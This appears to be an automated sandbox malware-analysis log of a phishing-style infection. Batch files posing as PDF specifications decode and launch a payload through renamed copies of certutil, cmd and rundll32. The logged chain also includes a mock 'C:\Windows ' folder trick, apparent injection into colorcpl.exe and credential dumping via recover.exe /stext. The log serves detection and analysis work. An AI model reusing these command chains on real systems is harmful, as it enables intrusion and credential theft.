Source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088234273.000000000319E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: recover.exe, recover.exe, 00000031.00000002.2094721987.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088234273.000000000319E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088234273.000000000319E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088234273.000000000319E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088234273.000000000319E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: recover.exe, 0000002F.00000003.2129375125.0000000002F43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: colorcpl.exe, 00000023.00000003.2087573159.000000002EF01000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088234273.000000000319E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2089639502.000000002F285000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2092393792.000000002F4A7000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2088600651.000000002F10D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2090923799.000000002EE7B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2135181141.000000002EF63000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000002F.00000002.2132072281.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Windows\SysWOW64\recover.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

graph_49-33246

Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1
Source: C:\Users\Public\alpha.pif	Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF
Source: C:\Users\Public\rdha.pif	Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0
Source: C:\Users\Public\ANYDESK.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\5964.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\ANYDESK.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\15897.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Users\Public\ANYDESK.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif"
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw"
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw"
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw"
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc"
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg"
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg"
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg"
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1
Source: C:\Users\Public\alpha.pif	Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF
Source: C:\Users\Public\rdha.pif	Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0
Source: C:\Users\Public\ANYDESK.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1	Jump to behavior
Source: C:\Users\Public\rdha.pif	Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF"	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\5964.cmd""	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\15897.cmd""	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\takeydqzzhsuw"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\wvqpzwbsnpkzgrsc"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\gxvizoluaxcejxogfbg"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\rdha.pif C:\\Users\\Public\\rdha.pif zipfldr.dll,RouteTheCall C:\Users\Public\ANYDESK.PIF	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c exit /b 0	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Mixer Specifications,PDF.bat" "C:\Users\Public\HEW.3GP" 9
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\ghf.pif C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12
Source: C:\Users\Public\alpha.pif	Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1
Source: C:\Users\Public\rdha.pif	Process created: C:\Users\Public\ANYDESK.PIF "C:\Users\Public\ANYDESK.PIF"
Source: C:\Users\Public\ANYDESK.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\expha.pif	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\Public\expha.pif	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\Public\expha.pif	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: certcli.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: certca.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: certcli.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: certca.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\ghf.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\rdha.pif	Section loaded: windows.storage.dll	Jump to behavior
